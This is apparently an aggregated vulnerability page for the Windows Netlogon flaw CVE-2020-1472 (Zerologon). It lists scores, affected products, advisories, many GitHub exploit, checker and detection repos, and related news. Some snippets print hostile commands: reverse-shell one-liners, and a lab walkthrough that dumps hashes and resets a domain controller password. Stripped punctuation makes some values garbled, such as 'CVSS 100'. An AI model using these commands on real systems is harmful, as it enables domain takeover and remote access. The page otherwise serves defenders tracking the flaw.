9.3
CVSSv2

CVE-2020-1472

Published: 17/08/2020 Updated: 24/12/2020
CVSS v2 Base Score: 9.3 | Impact Score: 10 | Exploitability Score: 8.6
CVSS v3 Base Score: 10 | Impact Score: 6 | Exploitability Score: 3.9
Vector: AV:N/AC:M/Au:N/C:C/I:C/A:C

Vulnerability Summary

Microsoft Windows could allow a remote malicious user to gain elevated privileges on the system, caused by an error when establisheing a vulnerable Netlogon secure channel connection to a domain controller. By executing a specially-crafted program, an attacker could exploit this vulnerability to execute arbitrary code with higher privileges.

Vulnerability Trend

Vulnerable Product Search on Vulmon Subscribe to Product

microsoft windows server 2008 r2

microsoft windows server 2012 -

microsoft windows server 2012 r2

microsoft windows server 2016 -

microsoft windows server 2016 1903

microsoft windows server 2016 1909

microsoft windows server 2016 2004

microsoft windows server 2019 -

fedoraproject fedora 32

fedoraproject fedora 33

opensuse leap 15.1

opensuse leap 15.2

canonical ubuntu linux 14.04

canonical ubuntu linux 16.04

canonical ubuntu linux 18.04

synology directory server

samba samba

Vendor Advisories

Synopsis Moderate: samba security and bug fix update Type/Severity Security Advisory: Moderate Topic An update for samba is now available for Red Hat Enterprise Linux 7Red Hat Product Security has rated this update as having a security impact of Moderate A Common Vulnerability Scoring System (CVSS) base s ...
Debian Bug report logs - #971048 samba: CVE-2020-1472 Package: src:samba; Maintainer for src:samba is Debian Samba Maintainers <pkg-samba-maint@listsaliothdebianorg>; Reported by: Salvatore Bonaccorso <carnil@debianorg> Date: Sat, 26 Sep 2020 19:21:02 UTC Severity: grave Tags: fixed-upstream, security, upstream ...
Arch Linux Security Advisory ASA-202009-17 ========================================== Severity: Critical Date : 2020-09-29 CVE-ID : CVE-2020-1472 Package : samba Type : access restriction bypass Remote : Yes Link : securityarchlinuxorg/AVG-1236 Summary ======= The package samba before version 4130-1 is vulnerable to access ...
Debian Bug report logs - #973399 samba: CVE-2020-14323 Package: src:samba; Maintainer for src:samba is Debian Samba Maintainers <pkg-samba-maint@listsaliothdebianorg>; Reported by: Salvatore Bonaccorso <carnil@debianorg> Date: Thu, 29 Oct 2020 21:06:05 UTC Severity: important Tags: security, upstream Found in ve ...
Debian Bug report logs - #973398 samba: CVE-2020-14383 Package: src:samba; Maintainer for src:samba is Debian Samba Maintainers <pkg-samba-maint@listsaliothdebianorg>; Reported by: Salvatore Bonaccorso <carnil@debianorg> Date: Thu, 29 Oct 2020 21:06:01 UTC Severity: important Tags: security, upstream Found in ve ...
Debian Bug report logs - #973400 samba: CVE-2020-14318 Package: src:samba; Maintainer for src:samba is Debian Samba Maintainers <pkg-samba-maint@listsaliothdebianorg>; Reported by: Salvatore Bonaccorso <carnil@debianorg> Date: Thu, 29 Oct 2020 21:09:01 UTC Severity: important Tags: security, upstream Found in ve ...
An issue has been found in Samba 40 and later, where an unauthenticated attacker on the network can gain administrator access by exploiting a netlogon protocol flaw, but only when used as domain controller Since version 48 (released in March 2018), the default behaviour of Samba has been to insist on a secure netlogon channel, which is a suff ...

Mailing Lists

Proof of concept exploit for the ZeroLogin Netlogon privilege escalation vulnerability ...
In August, Microsoft patched CVE-2020-1472, which gives administrator access to an unauthenticated user on a Domain Controller Microsoft gave it a CVSS score of 10 portalmsrcmicrosoftcom/en-us/security-guidance/advisory/CVE-2020-1472#ID0EUGAC The Samba security team was not contacted before the announcement, which is very sparse on ...

Github Repositories

CVE-2020-1472 POC Requires the latest impacket from GitHub with added netlogon structures Do note that by default this changes the password of the domain controller account Yes this allows you to DCSync, but it also breaks communication with other domain controllers, so be careful with this! More info and original research here Exploit steps Read the blog/whitepaper above so

CVE-2020-1472 POC Requires the latest impacket from GitHub with added netlogon structures Do note that by default this changes the password of the domain controller account Yes this allows you to DCSync, but it also breaks communication with other domain controllers, so be careful with this! More info and original research here Exploit steps Read the blog/whitepaper above so

CVE-2020-1472 POC Requires the latest impacket from GitHub with added netlogon structures Do note that by default this changes the password of the domain controller account Yes this allows you to DCSync, but it also breaks communication with other domain controllers, so be careful with this! Link to the original research wwwsecuracom/blog/zero-logon) Installing Only

CVE-2020-1472 Checker & Exploit Code for CVE-2020-1472 aka Zerologon Tests whether a domain controller is vulnerable to the Zerologon attack, if vulnerable, it will resets the Domain Controller's account password to an empty string NOTE: It will likely break things in production environments (eg DNS functionality, communication with replication Domain Controller

CVE-2020-1472 POC Requires the latest impacket from GitHub with added netlogon structures Do note that by default this changes the password of the domain controller account Yes this allows you to DCSync, but it also breaks communication with other domain controllers, so be careful with this! More info and original research here Exploit steps Read the blog/whitepaper above so

CVE-2020-1472 POC Requires the latest impacket from GitHub with added netlogon structures Do note that by default this changes the password of the domain controller account Yes this allows you to DCSync, but it also breaks communication with other domain controllers, so be careful with this! More info and original research here Exploit steps Read the blog/whitepaper above so

CVE-2020-1472 POC Requires the latest impacket from GitHub with added netlogon structures Do note that by default this changes the password of the domain controller account Yes this allows you to DCSync, but it also breaks communication with other domain controllers, so be careful with this! More info and original research here Exploit steps Read the blog/whitepaper above so

CVE 2020-1472 Script de validación

CVE-2020-1472 CVE 2020-1472 Script de validación Assumption: WinRM is enabled between domain controllers Required permissions: If child domains are present: Enterprise admin If single forest, single domain: Domain admin This script must be run on a primary domain controller with required permissions It will recursively query all the domain controllers within the Fores

Enumerate AD through LDAP with a collection of helpfull scripts being bundled

ADE - ActiveDirectoryEnum python -m ade usage: ade [-h] [--dc DC] [-o OUT_FILE] [-u USER] [-s] [-smb] [-kp] [-bh] [-spn] [-sysvol] [--all] [--no-creds] [--dry-run] [--exploit EXPLOIT] ___ __ _ ____ _ __ ______ / | _____/ /_(_) _____ / __ \(_)_______ _____/ /_____ _______

A simple implementation/code smash of a bunch of other repos

CVE-2020-1472-Easy This is definitely not something you would want to run on anything that you care about Basically does a zerologon exploit, dumps the hives, extracts the machine password, reinstalls the machine password It seems to work but have not had a lot of time to fully test it Will need the latest impacket to run it Example run /python cve-2020-1472-easymodepy -n

cve-2020-1472 复现利用及其exp

CVE-2020-1472 POC mac环境下通过proxychains代理的方式在window域环境中复现该漏洞。 Environment DC(主域控制器): Domain User(域成员主机): 通过gost直接设置socks5正向代理。 Attack Hacker(攻击机): 设置proxychains4 vim /Users/xq17/proxychains/proxychainsconf 增加PrxoyList列表 [ProxyList] socks5 102115542 8099 Attack Tools(

https://github.com/dirkjanm/CVE-2020-1472

CVE-2020-1472 POC Requires the latest impacket from GitHub with added netlogon structures Do note that by default this changes the password of the domain controller account Yes this allows you to DCSync, but it also breaks communication with other domain controllers, so be careful with this! More info and original research here Exploit steps Read the blog/whitepaper above so

[CVE-2020-1472] Netlogon Remote Protocol Call (MS-NRPC) Privilege Escalation (Zerologon)

[CVE-2020-1472] Netlogon Remote Protocol Call (MS-NRPC) Privilege Escalation (Zerologon) The attack described here takes advantage of flaws in a cryptographic authentication protocol (insecure use of AES-CFB8) that proves the authenticity and identity of a domain-joined computer to the Domain Controller (DC) Due to incorrect use of an AES mode of operation it is possible to sp

CVE-2020-1472 POC Requires the latest impacket from GitHub with added netlogon structures Do note that by default this changes the password of the domain controller account Yes this allows you to DCSync, but it also breaks communication with other domain controllers, so be careful with this! More info and original research here Exploit steps Read the blog/whitepaper above so

Zerologon Summary A Zeek detection package for CVE-2020-1472, also known as Zerologon, which is a CVSS 100 privilege escalation vulnerability against the Netlogon protocol for Windows Server domain controllers Notices By default, both notices are raised: Zerologon_Attempt indicates the requisite number of login attempts were made within a short period of time Zerologon_Pass

Static standalone binaries for Windows and Linux (both x64) of dirkjanm's CVE-2020-1472 POC Python scripts

ZeroLogon - dirkjanm CVE-2020-1472 static binaries Description This repository contains static standalone binaries for Windows and Linux (both x64) of dirkjanm's CVE-2020-1472 POC Python scripts: cve-2020-1472-exploitexe and restorepasswordexe All credit goes to Tom Tervoort for the original research and Dirk-jan Mollema for the Python scripts The build process is heav

CFB8 Zero IV Attack ❯ python cfb8_zero_iv_attackpy [!] Attack Success Number of trials: 275 Key: b'U\x1e\x9eoKd\x18\xdf\x0c\x05\xfc3\x1f4\xd9\x8e' IV: b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' Plaintext: b'\x00\x00\x00\x00\x00\x00\x00\x00' Ciphertext: b'\x00\x00\x00\x00\x00\x00\x00\x00' Reference Zerologon: U

Test tool for CVE-2020-1472

ZeroLogon testing script A Python script that uses the Impacket library to test vulnerability for the Zerologon exploit (CVE-2020-1472) It attempts to perform the Netlogon authentication bypass The script will immediately terminate when succesfully performing the bypass, and not perform any Netlogon operations When a domain controller is patched, the detection script will gi

Ladon Moudle CVE-2020-1472 Exploit

CVE-2020-1472-EXP Ladon Moudle CVE-2020-1472 Exploit

CVE-2020-1472漏洞复现过程

CVE-2020-1472 CVE-2020-1472漏洞复现过程 过程详见:blogcsdnnet/mukami0621/article/details/108605941

ZeroLogon testing script A Python script that uses the Impacket library to test vulnerability for the Zerologon exploit (CVE-2020-1472) It attempts to perform the Netlogon authentication bypass The script will immediately terminate when successfully performing the bypass, and not perform any Netlogon operations When a domain controller is patched, the detection script will g

Script to automate Checks for potential exploitation of CVE-2020-1472 (aka ZeroLogon) in the domain This is a very "quick and dirty" script that automates some of the leading artifects in determining an actual exploitation of CVE-2020-1472, compiled from multiple blogs Ideally, the 2nd check (for events from Security & System event logs) can be done from a S

C# Vulnerability Checker for CVE-2020-1472 Aka Zerologon

ZeroLogonChecker C# Vulnerability Checker for CVE-2020-1472 Aka Zerologon

CVE [+] CVE-2020-1472 | Windows Server Netlogon vul

Awesome Systools is a collection of sysadmins daily handy tools.

Awesome Systools Lists The Book of Secret Knowledge Awesome-Selfhosted: This is a list of Free Software network services and web applications which can be hosted locally Selfhosting is the process of locally hosting and managing applications instead of renting from SaaS providers Lucid Index: This site's goal is to help you find the software you need as quickly as possi

PoC for Zerologon (CVE-2020-1472) - Research credits to Tom Tervoort of Secura & exploit credits to dirkjanm

CVE-2020-1472 - Zero-Logon POC This exploit requires you to use the latest impacket from GitHub Ensure impacket installation is done with netlogon structures added Note : By default, successful exploitation changes the password of the DC Account Allows DCSync Breaks communication with other domain controllers (Be careful!) Original Research & information here

第一步 pip3 install -r requirementstxt 查看hash secretsdumppy molecule-labscom/administrator:Aa123456@192168175132 -just-dc-user 'AD$' 攻击 python3 CVE-2020-1472py AD AD$ 192168175132 查询域控hash secretsdumppy molecule-labscom/'AD$'@192168175132 -just-dc-user 'AD$' -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 恢复hash

Collection of C# projects. Useful for pentesting and redteaming.

RedCsharp Offensive C# tools CasperStager PoC for persisting NET payloads in Windows Notification Facility (WNF) state names using low-level Windows Kernel API calls CSExec An implementation of PSExec in C# CSharpCreateThreadExample C# code to run PIC using CreateThread CSharpScripts Collection of C# scripts CSharpSetThreadContext C# Shellcode Runner to execute

zeroscan / masscanning for Zerologon (CVE-2020-1472) Details in our Blog: Zerologon (CVE-2020-1472) finding and checking

https://github.com/Flangvik/SharpCollection

SharpCollection Nightly builds of common C# offensive tools, fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines Is your favorite tool missing? Feel free to open an issue or DM me on twitter @Flangvik Please note that Cobalt Strike's execute-assembly only accepts binaries compiled with the "Any CPU"

Check for events that indicate non compatible devices -> CVE-2020-1472

zerologon Check for events that indicate non compatible devices -> CVE-2020-1472

Common Vulnerability Scoring System (CVSS) Version 3

go-cvss - Common Vulnerability Scoring System (CVSS) Importing CVSS vector and scoring Supoort CVSS version 30 and 31 Exporting CVSS information with template string Sample Code Base Metrics package main import ( "fmt" "os" "githubcom/spiegel-im-spiegel/go-cvss/v3/metric" ) func main() { bm, err := metricNewBase()Deco

Invoke-ZeroLogon This code was heavily adapted from the C# implementation by the NCC Group's Full Spectrum Attack Simulation team and the original CVE published by Secura This script can be run in two modes: When the reset parameter is set to True, the script will attempt to reset the target computer’s password to the default NTLM hash (essentially an empty passwor

CFB8 Zero Bytes Attack ❯ python cfb8_zero_bytes_attackpy [!] Attack Success Number of trials: 275 Key: b'U\x1e\x9eoKd\x18\xdf\x0c\x05\xfc3\x1f4\xd9\x8e' IV: b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' Plaintext: b'\x00\x00\x00\x00\x00\x00\x00\x00' Ciphertext: b'\x00\x00\x00\x00\x00\x00\x00\x00' Reference Zerolo

Zerologon Exploit | CVE-2020-1472

Zerologon Checker & Exploit Code for CVE-2020-1472 Tests whether a domain controller is vulnerable to the Zerologon attack, if vulnerable, it will resets the Domain Controller's account password to an empty string

ZeroLogon testing script A Python script that uses the Impacket library to test vulnerability for the Zerologon exploit (CVE-2020-1472) It attempts to perform the Netlogon authentication bypass The script will immediately terminate when successfully performing the bypass, and not perform any Netlogon operations When a domain controller is patched, the detection script will g

Patch and enforcement key assessment for CVE 2020-1472

ZeroLogonAssess Patch and enforcement key assessment for CVE 2020-1472

Command line interface for Kenna API

A CLI for Kenna Platform Command line interface for Kenna API This application is created for the one who wants to get quick informaiton from Kenna platform The Kenna Modules Implemented with The API Vulnerabilities Assets Asset Tagging Asset Groups Asset group reporting Connectors Connector Runs Users Roles Fixes Applications Application Reporting Dashboard Gro

CVE-2020-1472 - Zero Logon vulnerability Python implementation

CVE-2020-1472 CVE-2020-1472 - Zero Logon vulnerability Python implementation

Netlogon Elevation of Privilege Vulnerability | NOPE its a bot

CVE-2020-1472- Netlogon Elevation of Privilege Vulnerability | NOPE its a bot Its a educational bot net use it at your own risk!

C# Vulnerability Checker for CVE-2020-1472 Aka Zerologon

ZeroLogonChecker C# Vulnerability Checker for CVE-2020-1472 Aka Zerologon

Pentest-Tools-Collection Active Directory WinPwn: githubcom/S3cur3Th1sSh1t/WinPwn Bloodhound: githubcom/BloodHoundAD/BloodHound impacket: githubcom/SecureAuthCorp/impacket ADRecon: githubcom/sense-of-security/ADRecon Ghostpack: githubcom/GhostPack OWA / EWS / O365 Mailsniper: githubcom/dafthack/MailSniper ExchangeRelayX: htt

内网渗透相关总结

Hack_For_Intranet 0x01 信息收集 1常见信息收集命令 #ipconfig: ipconfig /all ------> 查询本机 IP 段,所在域等 #net: net user ------> 本机用户列表 net localgroup administrators ------> 本机管理员[通常含有域用户] net user /domain ------> 查询域用户 net group /domain ------> 查询域里面的工作

zerologon script to exploit CVE-2020-1472 CVSS 10/10

zerologon zerologon script to exploit CVE-2020-1472 CVSS 10/10 Exploit code based on wwwsecuracom/blog/zero-logon and githubcom/SecuraBV/CVE-2020-1472 Original research and scanner by Secura, modifications by RiskSense Inc githubcom/risksense/zerologon To exploit, clear out any previous Impacket installs you have and install Impacket from g

Windows-Internal Notes

Windows-Internal Windows-Internal Notes Microsoft Active Direcotry NetLogon Elevation of privilege CVE-2020-1472 Impact: Recent version of Windows Server acting as Active Directory Domani Controllers (DCs) Impact: NetLogon Remote Procedure (MS-NRPC) NetLogon used within Active Directory deployments for authentication of users and machines NetLogoin is leverage by Microsoft

Exploit Code for CVE-2020-1472 aka Zerologon

CVE-2020-1472 Exploit Code for CVE-2020-1472 aka Zerologon

CVE-2020-1472复现时使用的py文件整理打包

CVE-2020-1472 CVE-2020-1472复现时使用的py文件整理打包

ZeroLogon testing script A Python script that uses the Impacket library to test vulnerability for the Zerologon exploit (CVE-2020-1472) It attempts to perform the Netlogon authentication bypass The script will immediately terminate when succesfully performing the bypass, and not perform any Netlogon operations When a domain controller is patched, the detection script will gi

Zerologon Exploit Script This script is used to test and exploit unpatched Domain Controllers for the Zerologon Vulnerability (CVE-2020-1472) More information on this vulnerability can by found here: wwwsecuracom/blog/zero-logon The PoC code for detection was provided by SecuraBV and can be found here: githubcom/SecuraBV/CVE-2020-1472 The exploit code has be

CVE-2020-1472

CVE-2020-1472 CVE-2020-1472 exploit来源: githubcom/dirkjanm/CVE-2020-1472 githubcom/SecuraBV/CVE-2020-1472

Zabbix Template to monitor for Windows Event Viewer event's related to Netlogon Elevation of Privilege Vulnerability - CVE-2020-1472. Monitors event ID's 5827, 5828 & 5829. See: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472

zabbix-template-CVE-2020-1472 Zabbix Template to monitor for Windows Event Viewer event's related to Netlogon Elevation of Privilege Vulnerability - CVE-2020-1472 Monitors event ID's 5827, 5828 & 5829 portalmsrcmicrosoftcom/en-US/security-guidance/advisory/CVE-2020-1472

Test script for CVE-2020-1472 for both RPC/TCP and RPC/SMB

Zerologon test for SMB & RPC A python script based on SecuraBV script Demonstrates that CVE-2020-1472 can be done via RPC/SMB, and not only over RPC/TCP Additionaly, there is a random byte in the final client challange & client credential - to test against trivial IDS signatures The RPC/SMB scan runs by default Depending on the target server, some may requir

Nightly builds of common C# offensive tools, fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.

SharpCollection Nightly builds of common C# offensive tools, fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines Is your favorite tool missing? Feel free to open an issue or DM me on twitter @Flangvik Azure DevOps? Each night at 03:00 AM, the Azure DevOps pipeline checks for new commits to all repositories master

Post-compromise AD password reset

Post-compromise AD password reset Notes copied from us-certcisagov/ncas/alerts/aa20-283a If there is an observation of CVE-2020-1472 Netlogon activity or other indications of valid credential abuse detected, it should be assumed the APT actors have compromised AD administrative accounts, the AD forest should not be fully trusted, and, therefore, a new forest should be

Notes Taken for HTB Machine

hackthebox Notes Taken for HTB Machine Will be periodiclly updated, created with the intend of unwraping all possible ways and to prep for exams created & maintained by: cyberwr3nch Contents Command Reference Tools Bloggers Commands Reference File Contents Active Directory Bruteforce SMB, Winrm Bruteforce, AD User Enumeration, Mounting Disks, BloodHound, rpcc

ZeroLogon testing script A Python script that uses the Impacket library to test vulnerability for the Zerologon exploit (CVE-2020-1472) It attempts to perform the Netlogon authentication bypass The script will immediately terminate when successfully performing the bypass, and not perform any Netlogon operations When a domain controller is patched, the detection script will g

Zeek package to detect Zerologon

Zerologon Summary A Zeek detection package for CVE-2020-1472, also known as Zerologon, which is a CVSS 100 privilege escalation vulnerability against the Netlogon protocol for Windows Server domain controllers Notices By default, both notices are raised: Zerologon_Attempt indicates the requisite number of login attempts were made within a short period of time Zerologon_Pass

ZeroLogon testing script A Python script that uses the Impacket library to test vulnerability for the Zerologon exploit (CVE-2020-1472) It attempts to perform the Netlogon authentication bypass The script will immediately terminate when succesfully performing the bypass, and not perform any Netlogon operations When a domain controller is patched, the detection script will gi

内网渗透工具

caoIntranet 内网渗透工具 ├─信息收集 │ ├─goby-win-x64-16154 │ │ ├─config │ │ │ └─langs │ │ ├─data │ │ │ ├─logs │ │ │ ├─result │ │ │ ├─task │ │ │ └─tmp │ │ ├─golib │ │ │ ├─exploits │ │ │ │ ├─system │ │ │ │ └─user │

ZeroLogon testing script A Python script that uses the Impacket library to test vulnerability for the Zerologon exploit (CVE-2020-1472) It attempts to perform the Netlogon authentication bypass The script will immediately terminate when successfully performing the bypass, and not perform any Netlogon operations When a domain controller is patched, the detection script will g

Windows NetLogon 权限提升漏洞复现(CVE-2020-1472) 需将impacketzip解压到当前文件夹 具体过程可参考文章:mpweixinqqcom/s/8rp0k5M2aPSPIXxVuIRMdQ 参考 githubcom/dirkjanm/CVE-2020-1472 githubcom/sv3nbeast/CVE-2020-1472

Protect your domain controllers against Zerologon (CVE-2020-1472).

Set-ZerologonMitigation Protect your domain controllers against Zerologon (CVE-2020-1472)

Microsoft 365 Defender - Resource Hub

Microsoft 365 Defender - Resource Hub Welcome to the Microsoft 365 Defender Resource Hub Update! as the list of Microsoft 365 Defender resources keeps growing I am highlighting additions Become a Microsoft Defender ATP Ninja Security Community Webinars On-demand webcast series: “Tracking the adversary” Microsoft 365 Security for IT Pros A must have

Automate installation of extra pentest tools on Kali Linux

WeaponizeKalish is a Bash script aimed at automating the process of downloading and installing extra tools for internal penetration tests on Kali Linux Basic principles behind this project are: Use bleeding-edge versions of offensive toolkits to possess their latest features and fixes When installing 3rd party software, use isolated environments to minimize potential depend

Awesome CSIRT is an curated list of links and resources in security and CSIRT daily activities.

CSIRT *Please contribute through pull requests- ;) Another great list: awesome-incident-response Books Nice list here by CertBR Practical Cryptography for Developers, github The Book of Secret Knowledge Security Engineering — Third Edition The Cyber Plumber's Handbook Links FIRST CertBR - useful links 7º Fórum Brasileiro de CSIRTs 9º Fó

2020年网上阅读过的文章记录

渗透 Seagate Central Storage远程执行代码0天 NSA固件漏洞挖掘 SKF实验室 GraphQL错误,JWT,SSRF,SSTI漏洞环境,可以和githubcom/D0g3-Lab/H1ve漏洞环境结合一起使用 hydra使用 新用法、结合tor代理破解密码 通过滥用文件下载功能中的SQL注入来窃取NTLMv2哈希 通过注入获取NTLMv2 hash值 持久性&nd

Powershell tool to automate Active Directory enumeration.

adPEAS adPEAS is a Powershell tool to automate Active Directory enumeration In fact, adPEAS is like a wrapper for different other cool projects like PowerView Empire Bloodhound and some own written lines of code As said, adPEAS is a wrapper for other tools They are almost all written in pure Powershell but some of them are included as compressed binary blob or C# code How

PENTESTING-BIBLE Explore more than 2000 hacking articles saved over time as PDF BROWSE HISTORY Created By Ammar Amer (Twitter @cry__pto) Support Paypal: -1- 3 Ways Extract Password Hashes from NTDSdit: wwwhackingarticlesin/3-ways-extract-password-hashes-from-ntds-dit -2- 3 ways to Capture HTTP Password in Network PC: wwwhackingarticlesin/3-ways-to-captu

Compiled binaries and ready code for Red Teaming

Red Team Binaries Compiled binaries and ready to use code for red teaming *References: githubcom/GhostPack githubcom/rootm0s/WinPwnage githubcom/0xbadjuju/WheresMyImplant githubcom/hfiref0x/UACME githubcom/RhinoSecurityLabs/Aggressor-Scripts pentestmagcom/simpleshellcodeinjector-ssi/ Exploits krbtgtpw/dacl-permis

Pentester's Promiscuous Notebook. Use your Ctrl-F to navigate around

snovvcrash’s Security Blog TOC {:toc} Reverse Shells securixykz/hack-faq/reverse-shell-ili-bjekkonnekthtml/ Bash root@kali:$ bash -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1 root@kali:$ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <LHOST> <LPORT> >/tmp/f Net

PENTESTING-BIBLE Explore more than 2000 hacking articles saved over time as PDF BROWSE HISTORY Created By Ammar Amer (Twitter @cry__pto) Support Paypal: -1- 3 Ways Extract Password Hashes from NTDSdit: wwwhackingarticlesin/3-ways-extract-password-hashes-from-ntds-dit -2- 3 ways to Capture HTTP Password in Network PC: wwwhackingarticlesin/3-ways-to-captu

Active Directory Kill Chain Attack & Defense Summary This document was designed to be a useful, informational asset for those looking to understand the specific tactics, techniques, and procedures (TTPs) attackers are leveraging to compromise active directory and guidance to mitigation, detection, and prevention And understand Active Directory Kill Chain Attack and Mo

PENTESTING-BIBLE Explore more than 2000 hacking articles saved over time as PDF BROWSE HISTORY Created By Ammar Amer (Twitter @cry__pto) Support Paypal: -1- 3 Ways Extract Password Hashes from NTDSdit: wwwhackingarticlesin/3-ways-extract-password-hashes-from-ntds-dit -2- 3 ways to Capture HTTP Password in Network PC: wwwhackingarticlesin/3-ways-to-captu

PENTESTING-BIBLE Explore more than 2000 hacking articles saved over time as PDF BROWSE HISTORY Created By Ammar Amer (Twitter @cry__pto) Support Paypal: -1- 3 Ways Extract Password Hashes from NTDSdit: wwwhackingarticlesin/3-ways-extract-password-hashes-from-ntds-dit -2- 3 ways to Capture HTTP Password in Network PC: wwwhackingarticlesin/3-ways-to-captu

CVEs enumerated by FireEye and that should be addressed to limit the effectiveness of leaked the Red Team tools CVE-2019-11510 – pre-auth arbitrary file reading from Pulse Secure SSL VPNs - CVSS 100 CVE-2020-1472 – Microsoft Active Directory escalation of privileges - CVSS 100 CVE-2018-13379 – pre-auth arbitrary file reading from Fortinet Fortigate SSL VPN

vFeed CVEs Vulnerability Indicators that should be addressed to limit the effectiveness of the Leaked FireEye Red Team tools CVE-2019-11510 – pre-auth arbitrary file reading from Pulse Secure SSL VPNs - CVSS 100 CVE-2020-1472 – Microsoft Active Directory escalation of privileges - CVSS 100 CVE-2018-13379 – pre-auth arbitrary file reading from Fortinet Forti

PENTESTING-BIBLE Explore more than 2000 hacking articles saved over time as PDF BROWSE HISTORY Created By Ammar Amer (Twitter @cry__pto) Support Paypal: -1- 3 Ways Extract Password Hashes from NTDSdit: wwwhackingarticlesin/3-ways-extract-password-hashes-from-ntds-dit -2- 3 ways to Capture HTTP Password in Network PC: wwwhackingarticlesin/3-ways-to-captu

Awesome Hacking Awesome hacking is a curated list of hacking tools for hackers, pentesters and security researchers Its goal is to collect, classify and make awesome tools easy to find by humans, creating a toolset you can checkout and update with one command This is not only a curated list, it is also a complete and updated toolset you can download with one-command! You can

Penetration_Testing_POC 搜集有关渗透测试中用到的POC、脚本、工具、文章等姿势分享,作为笔记吧,欢迎补充。 Penetration_Testing_POC 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone Web APP 提权辅助相关 PC tools-小工具集合 文章/书籍/教程相关 说明 请善用搜索[Ctrl+F]查找 IOT Device&Mobile

2020年发布到阿尔法实验室微信公众号的所有安全资讯汇总

欢迎关注阿尔法实验室微信公众号 20201231 [漏洞] 2020年增加的10个最严重的CVE blogdetectifycom/2020/12/30/top-10-critical-cves-added-in-2020/ Chromium RawClipboardHostImpl中的UAF漏洞 bugschromiumorg/p/chromium/issues/detail?id=1101509 [工具] Sarenka:OSINT工具,将来自shodan、censys等服务的数据集中在一处

PoC in GitHub 2020 CVE-2020-0014 It is possible for a malicious application to construct a TYPE_TOAST window manually and make that window clickable This could lead to a local escalation of privilege with no additional execution privileges needed User action is needed for exploitationProduct: AndroidVersions: Android-80 Android-81 Android-9 Android-10Android ID: A-1286745

PoC in GitHub 2020 CVE-2020-0014 (2020-02-13) It is possible for a malicious application to construct a TYPE_TOAST window manually and make that window clickable This could lead to a local escalation of privilege with no additional execution privileges needed User action is needed for exploitationProduct: AndroidVersions: Android-80 Android-81 Android-9 Android-10Android

PoC auto collect from GitHub.

PoC in GitHub 2020 CVE-2020-0022 In reassemble_and_dispatch of packet_fragmentercc, there is possible out of bounds write due to an incorrect bounds calculation This could lead to remote code execution over Bluetooth with no additional execution privileges needed User interaction is not needed for exploitationProduct: AndroidVersions: Android-80 Android-81 Android-9 Andr

Recent Articles

Threat Landscape Trends – Q3 2020
Symantec Threat Intelligence Blog • Threat Hunter Team • 18 Dec 2021

A look at the cyber security trends from the third quarter of 2020.

Posted: 18 Dec, 20203 Min ReadThreat Intelligence SubscribeThreat Landscape Trends – Q3 2020A look at the cyber security trends from the third quarter of 2020.We took a look through telemetry from our vast range of data sources and selected some of the trends that stood out from July, August, and September 2020

From significant increases in Emotet and Cobalt Strike activity to a spike in the number of server vulnerability exploit at...

Japan-Linked Organizations Targeted in Long-Running and Sophisticated Attack Campaign
Symantec Threat Intelligence Blog • Threat Hunter Team • 17 Nov 2021

Evidence that advanced persistent threat group Cicada is behind attack campaign targeting companies in 17 regions and multiple sectors.

Posted: 17 Nov, 20208 Min ReadThreat Intelligence SubscribeJapan-Linked Organizations Targeted in Long-Running and Sophisticated Attack CampaignEvidence that advanced persistent threat group Cicada is behind attack campaign targeting companies in 17 regions and multiple sectors.A large-scale attack campaign is targeting multiple Japanese companies, including subsidiaries located in as many as 17 regions around the globe in a likely intelligence-ga...

QNAP patches QTS vulnerabilities allowing NAS device takeover
BleepingComputer • Sergiu Gatlan • 07 Dec 2020

Network-attached storage (NAS) maker QNAP today released security updates to address vulnerabilities that could enable attackers to take control of unpatched NAS devices following successful exploitation.
The eight
by QNAP affect all QNAP NAS devices running vulnerable software.
These
and
(XSS) security bugs the company rated as medium and high severity security issues.
The XSS vulnerabilities could allow remote attackers to inject malicious code within ...

Critical MobileIron RCE Flaw Under Active Attack
Threatpost • Lindsey O'Donnell • 25 Nov 2020

Advanced persistent threat (APT) groups are actively exploiting a vulnerability in mobile device management security solutions from MobileIron, a new advisory warns.
The issue in question (CVE-2020-15505) is a remote code-execution flaw. It ranks 9.8 out of 10 on the CVSS severity scale, making it critical. The flaw was patched back in June, however, a proof of concept (PoC) exploit became available in September. Since then, both hostile state actors and cybercriminals have attempted to ex...

IT threat evolution Q3 2020. Non-mobile statistics
Securelist • Victor Chebyshev Fedor Sinitsyn Denis Parinov Oleg Kupreev Evgeny Lopatin Alexey Kulaev Alexander Kolesnikov • 20 Nov 2020

These statistics are based on detection verdicts of Kaspersky products received from users who consented to provide statistical data.
According to Kaspersky Security Network, in Q3:
In Q3 2020, Kaspersky solutions blocked attempts to launch one or more types of malware designed to steal money from bank accounts on the computers of 146,761 users.
!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t]....

APT Exploits Microsoft Zerologon Bug: Targets Japanese Companies
Threatpost • Elizabeth Montalbano • 19 Nov 2020

China-backed APT Cicada joins the list of threat actors leveraging the Microsoft Zerologon bug to stage attacks against their targets. In this case, victims are large and well-known Japanese organizations and their subsidiaries, including locations in the United States.
Researchers observed a “large-scale attack campaign targeting multiple Japanese companies” across 17 regions and various industry sectors that engaged in a range of malicious activity, such as credential theft, data exf...

Fake Microsoft Teams updates lead to Cobalt Strike deployment
BleepingComputer • Ionut Ilascu • 09 Nov 2020

Ransomware operators are using malicious fake ads for Microsoft Teams updates to infect systems with backdoors that deployed Cobalt Strike to compromise the rest of the network.
The attacks target organizations in various industries, but recent ones focused on the education sector (K-12), which depends on videoconferencing solutions due to Covid-19 restrictions.
In a non-public security advisory seen by BleepingComputer, Microsoft is warning its customers about these FakeUpdates camp...

Microsoft Warns Threat Actors Continue to Exploit Zerologon Bug
Threatpost • Elizabeth Montalbano • 30 Oct 2020

